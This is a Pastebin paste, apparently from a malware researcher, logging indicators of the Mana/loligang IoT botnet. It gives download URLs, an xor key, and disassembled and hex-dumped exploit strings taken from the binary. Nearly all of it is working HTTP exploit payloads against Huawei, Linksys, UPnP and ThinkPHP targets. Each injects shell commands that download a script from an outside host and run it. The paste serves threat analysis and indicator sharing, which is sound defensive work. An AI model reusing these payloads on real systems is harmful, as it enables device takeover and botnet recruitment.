API tools faq
paste
ankit_anubhav

MANA Botnet using 2 HFS

ankit_anubhav
May 27th, 2019
483
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.72 KB | None | 0 0
raw download clone embed print report
  1. STAGE 1 http://download.nadns.info/cross.sh
  2. Stage 2 22.186.15.231:5555/loligang.x86
  3.  
  4. Usual Mana botnet attack vectors : DEADBEEF encryption key. Brute force attacks are xored , exploit attacks are in plaintext
  5.  
  6. 0x805a030: 80 4f 05 08 ef be ad de 00 00 00 00 00 00 00 00 |.O..............|
  7.  
  8. 0x804e7d4: 68 18 7d 05 08 push 0x8057d18 ; "GET /login.cgi?cli=aa%20aa%27;wget%20http://download.nadns.info/cross.sh%20-O%20-%3E%20/tmp/cross.sh;sh%20/tmp/cross.sh%27$ HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\n\r\n"
  9.  
  10. 0x804f304: 68 00 7e 05 08 push 0x8057e00 ; "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g IP -l /tmp/kalon -r /bins/kalon.mips; /bin/busybox chmod 777 /tmp/kalon; /tmp/kalon huawei; /bin/busybox iptables -A INPUT -p tcp --destination-port 37215 -j DROP)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\r\n\r\n"
  11.  
  12. 0x8051724: 68 84 81 05 08 push 0x8058184 ; "POST /tmUnblock.cgi HTTP/1.1\r\nHost: 192.168.0.14:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.20.0\r\nContent-Length: 227\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nttcp_ip=-h+%60cd+%2ftmp%3b+rm+-rf+cross.sh%3b+wget+http%3a%2f%2fdownload.nadns.info%2fcross.sh%3b+chmod+777+cross.sh%3b+.%2fcross.sh+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1"
  13.  
  14. 0x8052be4: 68 50 83 05 08 push 0x8058350 ; "POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`wget http://download.nadns.info/cross.sh -O /tmp/cross.sh;sh /tmp/cross.sh`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n"
  15.  
  16. 0x805908f: 12 0c 11 10 12 10 0c 1b 16 22 00 00 00 47 45 54 |........."...GET|
  17. 0x805909f: 20 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 | /index.php?s=/i|
  18. 0x80590af: 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e |ndex/.hink.pp/in|
  19. 0x80590bf: 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e |vokefunction&fun|
  20. 0x80590cf: 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f |ction=call_user_|
  21. 0x80590df: 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b |func_array&vars[|
  22. 0x80590ef: 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 |0]=shell_exec&va|
  23. 0x80590ff: 72 73 5b 31 5d 5b 5d 3d 20 27 77 67 65 74 20 68 |rs[1][]= 'wget h|
  24. 0x805910f: 74 74 70 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6e |ttp://download.n|
  25. 0x805911f: 61 64 6e 73 2e 69 6e 66 6f 2f 63 72 6f 73 73 2e |adns.info/cross.|
  26. 0x805912f: 73 68 20 2d 4f 20 2f 74 6d 70 2f 63 72 6f 73 73 |sh -O /tmp/cross|
  27. 0x805913f: 2e 73 68 3b 20 63 68 6d 6f 64 20 37 37 37 20 2f |.sh; chmod 777 /|
  28. 0x805914f: 74 6d 70 2f 63 72 6f 73 73 2e 73 68 3b 20 2f 74 |tmp/cross.sh; /t|
  29. 0x805915f: 6d 70 2f 63 72 6f 73 73 2e 73 68 27 20 48 54 54 |mp/cross.sh' HTT|
  30. 0x805916f: 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f |P/1.1..Connectio|
  31. 0x805917f: 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 41 |n: keep-alive..A|
  32. 0x805918f: 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 |ccept-Encoding: |
  33. 0x805919f: 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 0d 0a 41 |gzip, deflate..A|
  34. 0x80591af: 63 63 65 70 74 3a 20 2f 0d 0a 55 73 65 72 2d 41 |ccept: /..User-A|
  35. 0x80591bf: 67 65 6e 74 3a 20 6c 6f 6c 69 67 61 6e 67 2f 32 |gent: loligang/2|
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!